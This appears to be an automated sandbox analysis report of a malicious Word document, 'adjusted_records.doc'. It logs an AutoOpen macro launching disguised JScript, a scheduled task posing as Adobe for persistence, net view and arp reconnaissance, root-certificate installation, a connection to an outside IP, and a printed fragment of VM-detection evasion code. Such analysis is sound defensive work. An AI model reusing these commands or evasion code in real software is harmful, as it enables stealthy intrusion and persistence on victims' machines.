Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user~1\AppData\Local\Temp\CVRBDE7.tmp
Document contains an OLE Word Document stream indicating a Microsoft Word fileShow sources
Source: adjusted_records.docOLE indicator, Word Document stream: true
Document contains summary information with irregular field valuesShow sources
Source: adjusted_records.docOLE document summary: title field not present or empty
Source: adjusted_records.docOLE document summary: author field not present or empty
Source: adjusted_records.docOLE document summary: edited time not present or 0
Found command line outputShow sources
Source: C:\Windows\System32\schtasks.exeConsole Write: ........a.~u..0......... ...................................`.....*.t.,.h.,...................................3.....G..v
Source: C:\Windows\System32\cmd.exeConsole Write: ........ ............ ..,.......E.lJ........ .......@FoJ. ..,........T,.V.lJ....".......,.........}u........`.....,.....
Queries process information (via WMI, Win32_Process)Show sources
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - select * from win32_process
Reads ini filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.ini
Reads software policiesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
SQL strings found in memory and binary dataShow sources
Source: wscript.exeBinary or memory string: Select * From Win32_NetworkAdapterConfiguration Where IPEnabled = True85.93.2.148;
Spawns processesShow sources
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\adjusted_records.doc
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c wscript.exe //b /e:jscript C:\Users\user~1\AppData\Local\Temp\crashpad.ini
Source: unknownProcess created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user~1\AppData\Local\Temp\crashpad.ini
Source: unknownProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /f /tn 'Adobe Acrobat Player Task' /tr 'wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log' /sc minute /mo 1
Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {6C8EBD0A-6843-4E76-AA78-1A12EAE50432} S-1-5-21-312302014-279660585-3511680526-1004:computer\user:Interactive:[1]
Source: unknownProcess created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'net view > C:\Users\user~1\AppData\Local\Temp\main.xml'
Source: unknownProcess created: C:\Windows\System32\net.exe net view
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'net view > C:\Users\user~1\AppData\Local\Temp\main.xml'
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'arp -a > C:\Users\user~1\AppData\Local\Temp\Themes453.xml'
Source: unknownProcess created: C:\Windows\System32\ARP.EXE arp -a
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'arp -a > C:\Users\user~1\AppData\Local\Temp\Themes546.xml'
Source: unknownProcess created: C:\Windows\System32\ARP.EXE arp -a
Source: unknownProcess created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe cmd.exe /c wscript.exe //b /e:jscript C:\Users\user~1\AppData\Local\Temp\crashpad.ini
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user~1\AppData\Local\Temp\crashpad.ini
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /f /tn 'Adobe Acrobat Player Task' /tr 'wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log' /sc minute /mo 1
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'net view > C:\Users\user~1\AppData\Local\Temp\main.xml'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'arp -a > C:\Users\user~1\AppData\Local\Temp\Themes453.xml'
Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log
Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'net view > C:\Users\user~1\AppData\Local\Temp\main.xml'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'arp -a > C:\Users\user~1\AppData\Local\Temp\Themes546.xml'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ARP.EXE arp -a
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ARP.EXE arp -a
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\InprocServer32
Writes ini filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile written: C:\Users\user~1\AppData\Local\Temp\crashpad.ini
Document contains embedded VBA macrosShow sources
Source: adjusted_records.docOLE indicator, VBA macros: true
Document contains an embedded VBA macro which executes code when the document is opened / closedShow sources
Source: adjusted_records.docOLE, VBA macro line: Sub AutoOpen()
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function AutoOpenName: AutoOpen
Document contains an embedded VBA macro which may execute processesShow sources
Source: adjusted_records.docOLE, VBA macro line: Set avfasci = CreateObject("Scripting.FileSystemObject")
Source: adjusted_records.docOLE, VBA macro line: Shell ivwubka, False
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function armando, API Shell("cmd.exe /c wscript.exe //b /e:jscript C:\Users\user~1\AppData\Local\Temp\crashpad.ini",False)Name: armando
Document contains an embedded VBA macro with suspicious stringsShow sources
Source: adjusted_records.docOLE, VBA macro line: Private Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Source: adjusted_records.docOLE, VBA macro line: Set avfasci = CreateObject("Scripting.FileSystemObject")
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function armando, String createobject: Set avfasci = CreateObject("Scripting.FileSystemObject")Name: armando
Document contains an embedded macro with GUI obfuscationShow sources
Source: adjusted_records.docStream path 'Macros/UserForm1/o' : Found suspicious string activexobject in non macro stream
Source: adjusted_records.docStream path 'Macros/UserForm1/o' : Found suspicious string scripting.filesystemobject in non macro stream
Suspicious javascript / visual basic script found (invalid extension)Show sources
Source: unknownProcess created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user~1\AppData\Local\Temp\crashpad.ini
Source: unknownProcess created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log
Source: unknownProcess created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user~1\AppData\Local\Temp\crashpad.ini
Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log
Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log
Wscript called in batch mode (surpress errors)Show sources
Source: unknownProcess created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user~1\AppData\Local\Temp\crashpad.ini
Source: unknownProcess created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log
Source: unknownProcess created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user~1\AppData\Local\Temp\crashpad.ini
Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log
Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log

HIPS / PFW / Operating System Protection Evasion:

barindex
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: taskeng.exeBinary or memory string: Progman
Source: taskeng.exeBinary or memory string: Program Manager
Source: taskeng.exeBinary or memory string: Shell_TrayWnd
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user~1\AppData\Local\Temp\crashpad.ini
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /f /tn 'Adobe Acrobat Player Task' /tr 'wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log' /sc minute /mo 1
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'net view > C:\Users\user~1\AppData\Local\Temp\main.xml'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'arp -a > C:\Users\user~1\AppData\Local\Temp\Themes453.xml'
Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log
Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\System32\wscript.exe wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'net view > C:\Users\user~1\AppData\Local\Temp\main.xml'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c 'arp -a > C:\Users\user~1\AppData\Local\Temp\Themes546.xml'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ARP.EXE arp -a
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ARP.EXE arp -a

Anti Debugging:

barindex
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Windows\System32\wscript.exeSystem information queried: KernelDebuggerInformation

Malware Analysis System Evasion:

barindex
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: wscript.exeBinary or memory string: %exOf("vmware"),216,16
Source: wscript.exeBinary or memory string: dexOf("vmware",32,217E
Source: wscript.exeBinary or memory string: ';function inArray(what, where) {for(var i=0; i<where.length; i++) {if(what == where[i]) {return true;}}return false;}function is_uac () {var oShell = WScript.CreateObject("WScript.Shell");if(oShell.RegRead("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA") == 0) {return false;} else {return true;}}function protect () {var is_debugged = 0;var wmi = GetObject("winmgmts:root/CIMV2");var Query = wmi.ExecQuery("SELECT * FROM Win32_BIOS");for (var items = new Enumerator(Query); !items.atEnd(); items.moveNext()) {var item = items.item();t = item["SMBIOSBIOSVersion"]["toLowerCase"]();if(t.indexOf("virtualbox") >= 0 || t.indexOf("vmware") >= 0) {is_debugged = 1;}t = item["SerialNumber"]["toLowerCase"]();if(t.indexOf("vmware") >= 0 || t.indexOf("parallels") >= 0) {is_debugged = 1;}}var Query = wmi.ExecQuery("SELECT * FROM Win32_PnPEntity");for (var items = new Enumerator(Query); !items.atEnd(); items.moveNext()) {var item = items.item();var t = item["DeviceID"]["toLowerCase"]();var l = i
Contains long sleeps (>= 3 min)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEThread delayed: delay time: 200
Found WSH timer for Javascript or VBS script (likely evasive script)Show sources
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\System32\wscript.exe TID: 3576Thread sleep time: -360000s >= -60s
Source: C:\Windows\System32\wscript.exe TID: 3576Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\taskeng.exe TID: 3632Thread sleep time: -100s >= -60s
Source: C:\Windows\System32\taskeng.exe TID: 3656Thread sleep time: -120000s >= -60s
Source: C:\Windows\System32\wscript.exe TID: 3696Thread sleep time: -360000s >= -60s
Source: C:\Windows\System32\wscript.exe TID: 3920Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\wscript.exe TID: 4076Thread sleep time: -180000s >= -60s
Source: C:\Windows\System32\wscript.exe TID: 4076Thread sleep time: -60000s >= -60s
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)Show sources
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_ComputerSystem
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - SELECT Model FROM Win32_ComputerSystem
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_ComputerSystem
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - SELECT Model FROM Win32_ComputerSystem
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * From Win32_NetworkAdapterConfiguration Where IPEnabled = True
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * From Win32_NetworkAdapterConfiguration Where IPEnabled = True
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * From Win32_NetworkAdapterConfiguration Where IPEnabled = True
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * From Win32_NetworkAdapterConfiguration Where IPEnabled = True
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * From Win32_NetworkAdapterConfiguration Where IPEnabled = True
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * From Win32_NetworkAdapterConfiguration Where IPEnabled = True
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * From Win32_NetworkAdapterConfiguration Where IPEnabled = True
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * From Win32_NetworkAdapterConfiguration Where IPEnabled = True

Hooking and other Techniques for Hiding and Protection:

barindex
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Monitors certain registry keys / values for changes (often done to protect autostart functionality)Show sources
Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
Stores large binary data to the registryShow sources
Source: C:\Windows\System32\wscript.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\System32\wscript.exeNetwork Connect: 85.93.2.148 187

Language, Device and Operating System Detection:

barindex
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Behavior Graph

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behavior_graph main Behavior Graph ID: 424458 Sample:  adjusted_records.do... Startdate:  09/11/2017 Architecture:  WINDOWS Score:  100 1 WINWORD.EXE 80 34 main->1      started     7 taskeng.exe 1 main->7      started     1841sig Document exploit detected (process start blacklist hit) 13317sig Suspicious javascript / visual basic script found (invalid extension) 13307sig Wscript called in batch mode (surpress errors) 13282reducedSig Signatures exceeded maximum capacity for this level. 3 signatures have been hidden. 7788reducedSig Signatures exceeded maximum capacity for this level. 3 signatures have been hidden. 77822reducedSig Signatures exceeded maximum capacity for this level. 3 signatures have been hidden. 13282sig Performs a network lookup / discovery via ARP 7788sig Installs new ROOT certificates 77822sig Installs new ROOT certificates 7784reducedSig Signatures exceeded maximum capacity for this level. 3 signatures have been hidden. 132812reducedSig Signatures exceeded maximum capacity for this level. 3 signatures have been hidden. 132818reducedSig Signatures exceeded maximum capacity for this level. 3 signatures have been hidden. 7784sig Installs new ROOT certificates 132812sig Performs a network lookup / discovery via ARP 132818sig Performs a network lookup / discovery via ARP 13289reducedSig Signatures exceeded maximum capacity for this level. 2 signatures have been hidden. 132815reducedSig Signatures exceeded maximum capacity for this level. 